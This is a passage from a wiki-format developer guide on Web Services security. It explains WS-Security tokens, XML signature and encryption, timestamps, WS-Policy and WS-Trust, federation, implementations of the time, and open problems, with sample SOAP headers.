''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
